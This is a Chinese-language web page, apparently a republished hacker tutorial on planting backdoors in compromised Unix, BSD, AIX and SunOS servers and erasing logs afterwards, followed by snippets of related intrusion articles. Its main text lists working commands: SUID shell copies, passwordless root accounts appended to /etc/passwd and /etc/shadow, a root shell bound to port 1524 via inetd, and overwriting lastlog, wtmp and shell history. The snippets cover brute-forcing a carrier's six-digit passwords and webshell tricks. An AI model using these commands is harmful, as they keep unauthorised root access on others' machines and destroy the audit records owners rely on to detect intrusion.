系统后门手法和日志的擦除_漏洞研究

好不容易搞了台服务器很不容易,如果被发现了就没了!可惜啊!

其实,开后门的方法有很多种

1. setuid 

#cp /bin/sh /tmp/.sh

#chmod u+s /tmp/.sh

加上 suid 位到shell上,虽然很简单,但容易被发现 

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd

即给系统增加一个 id 为 0(root)的帐号,无口令。

但管理员很快就可以发现哦!

3.echo "++">>/.rhosts 

如果这个系统开了512,513的port呵呵,就可以 

把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码! 

4.修改 sendmail.cf文件 增加一个"wiz" 命令; 

然后telnet www.xxx.com 25后,wiz。。。。ok 

 

5。 改已有用户密码

如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码

#passwd 可用passwd命令。

6.rootkit后门包 

网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!

-Bsd 后门:

echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd 

/usr/sbin/pwd_mkdb /etc/master.passwd 

这里我添加一个love的用户用户的ID是92;ROOT的是0哦! 

好了我们添加一个用户了!那么权限不够怎么办呢? 

cp /bin/sh /tmp/.x (这个x就是随便选个,好像 .sh , .a , .b 等等)

chmod 777 /tmp/.x

chmod +s /tmp/.x

用这个给他做个小后门吧

以后我们登陆的这台肉鸡以后就可以用tmp/.x来提升权限了。

-AIX 后门 (Kelvinzhou教我的,感谢你)

echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/.x 

/usr/sbin/inetd -s /tmp/.x 

rm /tmp/.x 

这样你就可以telnet ip 1524直接得到rootshell 

-SunOs 后门

echo "love::0:0::/:/bin/bash" >> /etc/passwd

echo "love::::::::" >> /etc/shadow 

当你以telnet上时,你就是root了!不过不保险!

-Linux 后门

echo "love::0:0::/:/bin/bash" >> /etc/passwd

echo "love::::::::" >> /etc/shadow 

有时间的话,就多留几个后门!

留了后门就要擦你的PP了,不是吧,这也忘了!

Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf

一般我们要清除的日志有 

lastlog 

utmp 

wtmp 

messages 

syslog 

sulog 

此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history (ksh),.history (csh),或.bash_history (bash)等。 

如果你有像wipe.c 那样的清日志的程序,就可以让它来做,不然的话就要手动了! 建议不要用rm掉日志,最好是,把日志改编,

比如: 

#cat > /usr/log/lastlog 

  ->这里是你要的写的东西,也可以不输入哦!

^d ->这里的^d是按键 ctrl + d! 结束!

#

好了不说了,要学的还好多,我也很菜!see!

时间: 2024-08-01 23:21:45

系统后门手法和日志的擦除_漏洞研究的相关文章

河南移动网络客服系统验证码的缺陷分析和利用!_漏洞研究

先声明哦 本文没有技术含量---只是为了证明java也可以作破解工具 中国移动的在线客服系统大家应该非常熟悉,因为我是移动忠实的河南用户,自然就从河南移动说起.在移动大厅办理过业务的用户都很清楚,用户密码只能设置成6位数0-9.而网上服务系统和移动的核心数据库是同步的,密码也只能局限为6位数字.如此简单的密码组合非常适合暴力破解. 我们来分析一下暴力破解的可行性.首先,系统对当天登录的次数要没有限制,我随便输入一个手机号测试系统容错次数.我试了十次,依然可以进入登录界面(yes-有戏).接下来,

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

典型入侵日志分析_漏洞研究

1.FTP日志分析  FTP日志和WWW日志在默认情况下,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期).例如ex040419,就是2004年4月19日产生的日志,用记事本可直接打开,普通的有入侵行为的日志一般是这样的:   #Software: Microsoft Internet Information Services 5.0(微软IIS5.0)   #Version: 1.0 (版本1.0)   #Date: 20040419 0315 (服务启动时

蜜罐技术:消除防火墙局限和脆弱_漏洞研究

防火墙是网络上使用最多的安全设备,是网络安全的重要基石.防火墙厂商为了占领市场,对防火墙的宣传越来越多,市场出现了很多错误的东西.其中一个典型的错误,是把防火墙万能化.但2002年8月的<计算机安全>中指出,防火墙的攻破率已经超过47%.正确认识和使用防火墙,确保网络的安全使用,研究防火墙的局限性和脆弱性已经十分必要.   防火墙十大局限性   一.防火墙不能防范不经过防火墙的攻击.没有经过防火墙的数据,防火墙无法检查.   二.防火墙不能解决来自内部网络的攻击和安全问题.防火墙可以设计为既防

分析进入Win2000后留下的足迹_漏洞研究

很多人对入侵Win2000系统很喜欢的吧,又有3389这样的界面型远程控制,还有这么多漏洞可以利用,而且关于入侵Win2000的文章又到处都是,方便啊.不过,你知道,你到底留下了哪些足迹在系统中么?最近作了个入侵分析,发现了不少东西,当然,估计到入侵时间然后在查找文件就列出来了.      我们在这里不分析来自FTP.HTTP的日志记录,因为这样来的入侵行为分析和防范比较容易,而通过帐号密码猜测进来的防范起来是比较麻烦的(安全配置相当OK的另说).       1.系统的日志记录. 好的管理员应

再探九酷网络个人主页空间管理系统_漏洞研究

本文作者:玄猫[B.C.T]  本文原发表于<黑客X档案>2005年第7期,网上首发地址为B.C.T(http://www.cnbct.org/showarticle.asp?id=495)和黑色森林(http://www.blackwoosd.cn)  本文版权归<黑客X档案>和作者杂志社所有   --------------------------------------------------------------------------------  玄猫在2004年12

Byshell后门:无进程无DLL无硬盘文件_漏洞研究

适合读者:入侵爱好者.网络管理员.黑器迷  前置知识:C基本语法  刘流:后门是黑客们永恒的话题,在各大网站如163.Yahoo.北大等相继被黑之后,越来越多的人开始关注服务器的安全,而各种后门技术也空前地火暴起来!今天我们将给大家带来一个重量级后门的使用.编程方法,让广大新手朋友们有好后门玩,让编程技术爱好者有好的后门编程技术可以借鉴.当然,更多的新技术还等你去发掘.  Byshell后门:无进程无DLL无硬盘文件无启动项  现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多

你根本想不到的——IIS另类后门_漏洞研究

终于由学校步入了社会,发现其实学校还是有很多值得我们留恋的地方,而工作其实蛮辛苦的,最主要的是不能经常和朋友一起去网上玩了.上周六回了趟学校,在主机房里和做网管的朋友聊天,偶然发现一个很熟的ASP程序在服务器的网站目录里(以前我是学校网络组的成员之一),于是连了下看看,没有给予匿名浏览的权限,不过账号勾选的是记住密码,登录成功.网页显示"添加test2用户成功","添加test2管理员成功".呵呵,我连管理员密码都不知道呢.打开3389,叫朋友看了下用户列表-- 

揭露88red生成htm静态页面企业建站系统漏洞第1/2页_漏洞研究

作者:小帥(xsser)@[0.S.T]  本文已发表在<黑客手册>第4期,转载请注明出处,或以超链接方式注明:http://blog.0kee.com/xiaoshuai 小帥's blog 很久没去asp300溜达了,不去总觉得的对不起这个发布站的流量,也对不起黑客手册那么多读者的强烈要求(别扔鸡蛋!扔钱!),那好,既然牛都吹起来了,我不得不冒着生命危险看看代码吧,反正我下载下来的时候就觉得很伟大,这个系统很伟大,他吹的比我还大,好好,我们看他怎么说的:88red生成htm静态页面企业建站